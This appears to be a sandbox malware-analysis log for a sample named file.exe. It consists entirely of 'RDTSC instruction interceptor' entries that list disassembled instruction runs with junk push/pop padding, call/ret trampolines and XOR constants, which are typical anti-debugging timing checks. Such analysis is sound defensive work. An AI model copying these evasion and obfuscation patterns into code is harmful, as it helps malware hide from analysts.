    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C861F2 second address: C86230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48ABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007FB5F8D48AC1h 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 jmp 00007FB5F8D48AC5h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CFA1 second address: C7CFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C86C77 second address: C86CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FB5F8D48AB8h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ecx 0x00000014 push edx 0x00000015 ja 00007FB5F8D48AB6h 0x0000001b jmp 00007FB5F8D48AC7h 0x00000020 pop edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87288 second address: C87293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB5F8D48006h 0x0000000a pop edi 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87293 second address: C872B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48AC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C872B4 second address: C872D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5F8D4800Ch 0x00000009 jl 00007FB5F8D48006h 0x0000000f popad 0x00000010 push edi 0x00000011 jl 00007FB5F8D48006h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C872D4 second address: C872D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C872D9 second address: C872F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB5F8D48012h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C88A83 second address: C88A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C88A8A second address: C88A91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C240 second address: C8C244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8EE36 second address: C8EE40 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB5F8D4800Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8EE40 second address: C8EE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB5F8D48ABCh 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52606 second address: C5260C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5260C second address: C52629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB5F8D48AC8h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52629 second address: C5262E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C92689 second address: C9268D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9280D second address: C9281C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9281C second address: C92837 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FB5F8D48AC5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C92E02 second address: C92E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C92F5B second address: C92F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FB5F8D48AC5h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C92F7A second address: C92F84 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB5F8D48006h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C94C4E second address: C94C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C94C54 second address: C94C66 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FB5F8D48006h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C94C66 second address: C94C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C94CC2 second address: C94CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 xor dword ptr [esp], 5D25A757h 0x0000000c mov edi, dword ptr [ebp+122D3AE1h] 0x00000012 push 481A4485h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95285 second address: C9528B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95887 second address: C9588D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9588D second address: C95891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95B51 second address: C95B82 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB5F8D4800Ch 0x00000008 jns 00007FB5F8D48006h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jl 00007FB5F8D48025h 0x00000017 pushad 0x00000018 jmp 00007FB5F8D48017h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95D45 second address: C95D4F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB5F8D48AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95EAF second address: C95EE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FB5F8D48008h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 pop esi 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95EE2 second address: C95EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95EE6 second address: C95EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9647D second address: C96481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C96DBC second address: C96DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C96DC0 second address: C96DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C97D0A second address: C97D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FB5F8D48008h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov esi, 51DB79B5h 0x00000028 push 00000000h 0x0000002a jmp 00007FB5F8D4800Ch 0x0000002f push 00000000h 0x00000031 add dword ptr [ebp+122D2F6Bh], edx 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C97D52 second address: C97D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98867 second address: C9886C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9886C second address: C9887F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FB5F8D48ABCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9887F second address: C98883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98883 second address: C9888E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FB5F8D48AB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99276 second address: C9928F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48015h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9928F second address: C99295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99295 second address: C99299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99299 second address: C9929D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99DBA second address: C99E2D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB5F8D4800Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c jmp 00007FB5F8D48017h 0x00000011 pop ecx 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FB5F8D48008h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D17C1h], edx 0x00000033 push 00000000h 0x00000035 mov edi, dword ptr [ebp+122D3B55h] 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 push edi 0x00000042 pop edi 0x00000043 jmp 00007FB5F8D48011h 0x00000048 popad 0x00000049 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9AA6D second address: C9AA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9B580 second address: C9B5F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FB5F8D48008h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov esi, 718DC752h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FB5F8D48008h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 sub dword ptr [ebp+12457E73h], ebx 0x0000004b xchg eax, ebx 0x0000004c jno 00007FB5F8D48010h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 je 00007FB5F8D48006h 0x0000005d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9B5F4 second address: C9B5FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA0B6E second address: CA0B81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D4800Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA0B81 second address: CA0B93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB5F8D48ABDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2945 second address: CA294B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA294B second address: CA294F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA47DB second address: CA47DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA760F second address: CA7613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7613 second address: CA7619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7619 second address: CA761F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA761F second address: CA7623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7623 second address: CA7664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FB5F8D48AB8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 xor bx, 5A59h 0x0000002a push 00000000h 0x0000002c mov ebx, dword ptr [ebp+122D1A38h] 0x00000032 push 00000000h 0x00000034 mov ebx, dword ptr [ebp+122D3979h] 0x0000003a push eax 0x0000003b pushad 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA84A7 second address: CA84C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D4800Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FB5F8D48006h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA84C0 second address: CA84DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FB5F8D48AC0h 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA84DE second address: CA84E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA94D1 second address: CA94D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA94D7 second address: CA94FB instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB5F8D48006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB5F8D48014h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB50D second address: CAB567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+122D3A11h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FB5F8D48AB8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 pop edi 0x00000033 push eax 0x00000034 push edi 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FB5F8D48AC9h 0x0000003c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC456 second address: CAC4C9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB5F8D48008h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007FB5F8D48015h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FB5F8D48008h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c sub dword ptr [ebp+124665A0h], edx 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D2A56h], edx 0x0000003a jmp 00007FB5F8D48019h 0x0000003f xchg eax, esi 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push ecx 0x00000045 pop ecx 0x00000046 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC4C9 second address: CAC4CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC4CD second address: CAC4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC4D3 second address: CAC4FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD43E second address: CAD4A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FB5F8D48006h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FB5F8D48008h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push ebx 0x00000028 pushad 0x00000029 mov edi, dword ptr [ebp+122D34FDh] 0x0000002f ja 00007FB5F8D48006h 0x00000035 popad 0x00000036 pop edi 0x00000037 clc 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007FB5F8D48008h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 push 00000000h 0x00000056 mov ebx, edx 0x00000058 xchg eax, esi 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD4A3 second address: CAD4A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF59C second address: CAF5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF5A0 second address: CAF5A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB28E3 second address: CB28EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF76E second address: CAF77C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF77C second address: CAF781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF86D second address: CAF887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5F8D48AC2h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF887 second address: CAF88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C710 second address: C5C73C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB5F8D48AB6h 0x00000008 jmp 00007FB5F8D48AC4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FB5F8D48AB8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C73C second address: C5C740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C740 second address: C5C744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBA719 second address: CBA721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBA721 second address: CBA74A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48AC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB5F8D48ABDh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBA8A4 second address: CBA8A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBA8A8 second address: CBA8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FB5F8D48AB6h 0x0000000e rdtsc
